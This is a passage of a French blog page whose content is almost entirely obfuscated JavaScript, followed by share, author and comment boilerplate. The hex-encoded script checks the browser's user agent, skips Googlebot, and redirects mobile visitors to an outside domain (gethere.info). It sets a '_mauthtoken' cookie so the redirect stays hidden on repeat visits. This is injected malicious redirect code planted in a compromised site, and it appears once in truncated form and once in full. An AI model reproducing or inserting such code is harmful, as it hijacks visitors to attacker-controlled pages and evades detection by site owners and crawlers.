)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Partager !

A propos de l'auteur

Image de : (a + b)² = a² + 2ab + b²

Aucun commentaire

Abonnez vous au Flus RSS des commentaires

Réagissez à cet article